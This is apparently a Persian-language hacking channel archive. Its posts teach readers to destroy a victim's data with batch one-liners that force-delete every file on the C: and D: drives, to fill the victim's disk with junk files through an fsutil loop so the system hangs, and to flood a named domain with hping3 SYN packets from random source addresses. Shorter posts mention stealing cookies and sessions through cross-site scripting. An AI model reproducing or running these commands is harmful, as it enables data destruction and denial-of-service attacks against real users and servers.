238
订阅者
无数据24 小时
-87 天
-4630 天
帖子存档
238
دوستان عزیز ، مراقب باشید که روی سیستم شخص بدافزار نباشه که اطلاعات بک کپی نخوره ، حتما چک کنید
238
با سلام خدمت همگی دوستان قدیمی و جدید توی این آموزش قراره راجب از بین بردن اطلاعات سیستم قربانی و به هنگ انداختن سیستم قربانی صحبت کنیم
اما از اونجایی که کمیته فیلترینگ به این وبلاگ خیلی لطف داره مجبوریم یه خرده ریز توضیح بدیم تا خودتون کار اصلیشو انجام بدید
همونطور که قبلا گفته بودم
ویروسای مخرب همیشه از تکه کدهای ساده و کاربردی ایجاد میشن
برای همین ما هم قراره توی این پست تکه کد ساده و کاربردی معرفی کنیم که میتونه اطلاعات یه سیستم رو از بین ببره و یکسری فایل آت و آشغال رو با فایلای اصلی و شاید مهم سیستم قربانی جایگزین کنه
صد البته به جای اینکار ما میتونیم با دستور فرمت خیلی سریعتر و راحت تر اینکار رو انجام بدیم
اما بعضی وقتا سطح دسترسی اجازه اینکار رو نمیده که ما هم خیلی راحت میتونیم با یه تکه کد ساده از یه روش دیگه پیروی کنیم
یا اصن برنامه های کاربردی و مخرب دیگه بسازیم و اهداف خودمون رو پیاده سازی کنیم
For /R D:\ %i in (*) do echo %i && Ping "LocalHost" > nul -n 2 && CLS
کد بالا رو که توی خط فرمان وارد کنید متوجه میشید که میاد و اسم تک تک فایلاتون رو دو ثانیه یکبار دونه به دونه نشون میده
حالا ما میتونیم به جای دستور Echo از دستور Del استفاده کنیم تا به جای نمایش فایل ها اون فایل از بین بره
For /R D:\ %i in (*) do del /F /S /Q %i && Ping "LocalHost" > nul -n 2 && CLS
که البته چون ما از دستور Ping استفاده کردیم و دستور دادیم که هر دو ثانیه یکبار یه فایل پاک بشه اینکار زیاد جالب نمیشه و ممکنه پروسه ی برناممون یه خرده طولانی بشه که بهتره این شکلی بنویسیم :
For /R D:\ %i in (*) do del /F /S /Q %i CLS
حتما دقت کنید از کدهای بالا داخل خط فرمان استفاده کنید و سریعا بعد از اجرا خط فرمان رو ببندین یا کلید های ترکیبی Ctrl + C رو فشار بدین تا کد وارد شده به روند اجرا و تخریب خودش ادامه نده
و اینکه دقت کنین اگه قراره داخل یه Batch فایل قرار بدین و از راه دور به سیستم قربانی دسترسی ندارین باید به جای i% حتما از i%% استفاده کنین
همونطور که گفتم هدفم یه اشاره ی ریز بود و حالا شما هستین که باید از تکه های بالا یه برنامه مخرب بسازین و به جای تخریب فایل های درایو D دستور تخریب فایل درایوای دیگه رو هم بدین
For /R C:\ %%i in (*) do del /F /S /Q %%i CLS
For /R D:\ %%i in (*) do del /F /S /Q %%i CLS
Va...
کدهای بالا هم برای یه فایل Batch هستش که باید به جای ...Va اسم درایوهای دیگه رو هم اضافه کنین
ضمنا به این مورد اشاره کنم که میتونین علاوه بر لیست و حذف کردن فایل ها
داخل کد به جای ستاره ( * ) از نقطه ( . ) استفاده کنین و اسم فولدرها یا همون پوشه های سیستم قربانی رو بدست بیارین و بعدش با دستور RmDir اونهارو از بین ببرید که من طرز نوشتنش رو گفتم و نوشتنش با خودتونه که یه خرده تنبل به بار نیاین :)
حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت
برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه
یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین
Cd %UserProfile%\Desktop
:Start
Fsutil file createnew %random%.bak %random%
Fsutil file createnew %random%.mp3 %random%
Fsutil file createnew %random%.mp4 %random%
Goto Start
وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید
بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن
در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه...
همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم
Fsutil file createnew %random%.bak 999999999
مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه
اما این کدها کاربردای دیگه هم داره
به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن...
در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید
اگر سوالی هم بود بپرسین حتما سر فرصت جوابتون رو میدم238
شما میخاید ایپی یا کوکی و سشن های چند نفرو بدست بیارید اول از همه میرید تو اون کامنتا تحلیل میکنید
238
برایه مثال یه سایت ک نظر سنجی داره و واسه کاربرا قابل نمایشه مثالا دیجی کالا که عملا فرم ورودی و خروجیش فیلتره و این فازینگ و حمله روش جواب نیست و این فقط یه تعوری و توضیح حساب میشه
238
بروت حملات بوسیله cross-site scrpting type of injection مهاجم یه کد مخرب malicious رو به وبسایت تزریق میکنه
238
dig cpcod——.com
; <<>> DiG 9.20.15-2-Debian <<>> cpcod——.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 582
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;cpcod—-.com. IN A
;; ANSWER SECTION:
cpcod—-.com. 102 IN A 104.21.64.28
cpcod—-.com. 102 IN A 172.67.175.13
;; Query time: 111 msec
;; SERVER: 10.255.255.1#53(10.255.255.1) (UDP)
;; WHEN: Wed Dec 17 15:00:45 CST 2025
;; MSG SIZE rcvd: 74
238
┌──(kiya㉿imkiya)-[~/Desktop]
└─$ sudo hping3 -c 10000000000 -d 12000 -S -p 443 --flood --rand-source cpcod———.com
[sudo] password for kiya:
HPING cpcod——.com (tun0 104.21.64.28): S set, 40 headers + 12000 data bytes
hping in flood mode, no replies will be shown
یکی از مزایای hping3 تارگت بصورت دامین هم بدی خودکار ایپی ک ضعیف تره رو اینجکت و حمله اتوماسیون انجام میشه مثل نمونه
238
بین فلادینگ ریزی که میبینید ip vps & server که پشت cdn و بهترین فایروال و اینتروک هست رو اختلال ایجاد میکنه بنظرم این همه حجم خلاقیت هم هنوز قدیمی نشده
238
یک نمونه برا. تست
Sudo hping3 -c 1000000 -d 120000 -s - پورت باز -flood -rand-source ایپی تارگت
